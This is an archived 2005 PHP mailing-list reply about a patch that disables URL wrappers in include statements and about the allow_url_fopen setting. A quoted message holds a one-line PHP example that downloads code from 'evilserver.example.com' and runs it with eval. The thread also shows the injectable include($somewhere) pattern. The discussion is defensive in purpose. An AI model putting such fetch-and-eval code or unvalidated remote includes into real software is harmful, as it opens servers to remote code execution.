Posted by Jason Wong on 03/02/05 21:39

On Thursday 03 March 2005 03:04, Richard Lynch wrote:
> Tom Z Meinlschmidt wrote:
> > Tell me - how do you want to turn off remote includes and remain
> > remote file working?
>
> Change the PHP source?
>
> That's the only viable answer I can think of; though I doubt it's one
> you want to hear/use.
>
> Sorry.

Funnily enough I think you'll find that he did (change the source) :)

> > allow_url_fopen turns off _both_. There's no choice what to disable
>
> Consider this:
>
> <?php
> eval(implode('',file("http://evilserver.example.com")));
> ?>
>
> So, like, what's the point to turning off only remote include and
> keeping remote file?

I believe you're missing the point of the patch. It is to prevent people
from injecting malicious remote locations in $somewhere:

include($somewhere);

Of course one should always validate $somwhere before using it but ...

--
Jason Wong -> Gremlins Associates -> www.gremlins.biz
Open Source Software Systems Integrators
* Web Design & Hosting * Internet & Intranet Applications Development *
------------------------------------------
Search the list archives before you post
http://marc.theaimsgroup.com/?l=php-general
------------------------------------------
New Year Resolution: Ignore top posted posts

• Prev in thread: Re: [PHP] Re: patch to php 4.3.10 to disabling URL wrappers in include like statements
• Next in forum: Re: [PHP] Setting cookie on first visit
• Prev in forum: Re: [PHP] Logging with PHP to SMTP server
• Thread view: Re: [PHP] Re: patch to php 4.3.10 to disabling URL wrappers in include like statements

[Reply to this message]